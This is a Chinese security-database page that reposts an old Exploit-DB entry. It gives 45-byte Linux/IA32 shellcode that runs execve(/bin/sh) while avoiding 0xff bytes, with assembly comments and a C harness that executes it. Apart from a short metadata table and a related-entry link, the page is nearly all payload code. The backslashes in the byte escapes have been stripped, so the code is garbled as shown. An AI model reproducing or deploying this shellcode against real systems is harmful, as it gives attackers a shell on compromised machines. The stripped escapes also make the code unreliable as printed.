Linux/IA32 – execve(/bin/sh) + 0xff-Free Shellcode (45 bytes)-安全小百科

Linux/IA32 – execve(/bin/sh) + 0xff-Free Shellcode (45 bytes)

漏洞ID	1054667	漏洞类型
发布时间	2004-09-26	更新时间	2004-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13425

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*

  0xff-less execve() /bin/sh by anathema <[email protected]>

*/

#include <stdio.h>
#include <stdlib.h>

unsigned char code[] = 

/* Linux/IA32 0xff-less execve() shellcode.  */

"x89xe6"                          /* movl %esp, %esi          */
"x83xc6x30"                      /* addl $0x30, %esi         */
"xb8x2ex62x69x6e"              /* movl $0x6e69622e, %eax   */
"x40"                              /* incl %eax                */
"x89x06"                          /* movl %eax, (%esi)        */
"xb8x2ex73x68x21"              /* movl $0x2168732e, %eax   */
"x40"                              /* incl %eax                */
"x89x46x04"                      /* movl %eax, 0x04(%esi)    */
"x29xc0"                          /* subl %eax, %eax          */
"x88x46x07"                      /* movb %al, 0x07(%esi)     */
"x89x76x08"                      /* movl %esi, 0x08(%esi)    */
"x89x46x0c"                      /* movl %eax, 0x0c(%esi)    */
"xb0x0b"                          /* movb $0x0b, %al          */
"x87xf3"                          /* xchgl %esi, %ebx         */
"x8dx4bx08"                      /* leal 0x08(%ebx), %ecx    */
"x8dx53x0c"                      /* leal 0x0c(%ebx), %edx    */
"xcdx80"                          /* int $0x80                */
;

void main()
{
  void (*s)() = (void *)code;

  printf("Shellcode length: %dnExecuting..nn",
      strlen(code));
  s();
}

// milw0rm.com [2004-09-26]

相关推荐: PHP-Nuke 5.0 – ‘user.php’ Form Element Substitution

PHP-Nuke 5.0 – ‘user.php’ Form Element Substitution 漏洞ID 1053550 漏洞类型发布时间 2001-07-27 更新时间 2001-07-27 CVE编号 N/A CNNVD-ID N/A 漏洞平台 …

文章版权归作者所有，未经允许请勿转载。

THE END